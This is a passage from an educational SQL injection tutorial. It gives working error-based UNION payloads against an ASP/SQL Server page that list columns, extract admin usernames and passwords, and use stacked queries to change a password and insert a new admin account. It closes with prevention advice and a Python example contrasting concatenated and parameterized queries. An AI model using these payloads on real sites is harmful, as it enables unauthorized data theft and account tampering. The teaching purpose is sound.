Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtain the rest of the column names, i.e. "password" and "details". We know we have them all when we get the following error message:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
How to retrieve any data we want?
Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
How to get numeric string value?
There is a limitation with the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters 0-9 only). Let's say we are trying to get the password of "trinity", which is "31173":
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason is that the password "31173" will be converted into a number before the UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus we will not be able to retrieve any numeric entry.
To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append any text we want to the password. (The ASCII code for '+' is 0x2b.) We append '(space)morpheus' to the actual password. Therefore, even if we have a numeric string '31173', it becomes '31173 morpheus'. By manually calling the convert() function to convert '31173 morpheus' into an integer, SQL Server will throw out an ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
How to update/insert data into the database?
When we have successfully gathered all the column names of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change the password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
How to avoid SQL Injection?
Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric values, convert them to an integer before passing them into the SQL statement, or use ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" to use a low privilege user in the SQL Server Security tab.
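The root cause in the `v_cat` snippet earlier is that user input is spliced into the SQL text, so a quote in the value ends the string literal and the rest becomes SQL. Character filtering, as listed in the prevention section, narrows the problem but is not the standard fix; the standard fix is a parameterized query (bind variables), where the database receives the SQL and the values separately and a value can never become SQL. The following is an added Python example, not code from the tutorial, using an in-memory SQLite database in place of the ASP/MS SQL Server setup: the product lookup and the login check are each shown in concatenated form (mirroring the walkthrough) and in parameterized form, and the `' or 'a'='a` input from the walkthrough is run against both. Table contents are constructed to match the walkthrough's names.

```python
import sqlite3

def make_db():
    """Constructed product and admin_login tables with the walkthrough's values."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, PCategory TEXT);
        INSERT INTO product (name, PCategory)
            VALUES ('apple', 'food'), ('hammer', 'tools'), ('bread', 'food');
        CREATE TABLE admin_login (login_id INTEGER, login_name TEXT, password TEXT);
        INSERT INTO admin_login VALUES (1, 'neo', 'm4trix'), (2, 'trinity', '31173');
    """)
    return conn

def vulnerable_products(conn, category):
    """Mirrors the ASP snippet: the category value is concatenated into the SQL text,
    so a quote inside it closes the literal and the remainder is executed as SQL."""
    sqlstr = "SELECT name FROM product WHERE PCategory='" + category + "'"
    return [row[0] for row in conn.execute(sqlstr)]

def parameterized_products(conn, category):
    """Same query with a bound parameter: the driver sends the value separately,
    so quotes in it are just characters to compare against PCategory."""
    sql = "SELECT name FROM product WHERE PCategory=?"
    return [row[0] for row in conn.execute(sql, (category,))]

def vulnerable_login(conn, user, pw):
    """Login check built by string formatting (the bypass target)."""
    sqlstr = (f"SELECT login_name FROM admin_login "
              f"WHERE login_name='{user}' AND password='{pw}'")
    row = conn.execute(sqlstr).fetchone()
    return row[0] if row else None

def parameterized_login(conn, user, pw):
    """Same check with bound parameters; the injected text matches no account."""
    row = conn.execute(
        "SELECT login_name FROM admin_login WHERE login_name=? AND password=?",
        (user, pw)).fetchone()
    return row[0] if row else None

def safe_int(value):
    """For numeric parameters such as id=10: convert to int before the value
    goes anywhere near SQL, and reject anything that is not a plain integer."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return None

if __name__ == "__main__":
    conn = make_db()
    injected = "food' or 'a'='a"
    print(vulnerable_products(conn, injected))       # all three products
    print(parameterized_products(conn, injected))    # []
    print(vulnerable_login(conn, injected, injected))    # 'neo'
    print(parameterized_login(conn, injected, injected)) # None
```

Stored passwords here are plaintext only because the walkthrough's table is; a real table would hold salted hashes, which also blunts the UNION-based extraction described above.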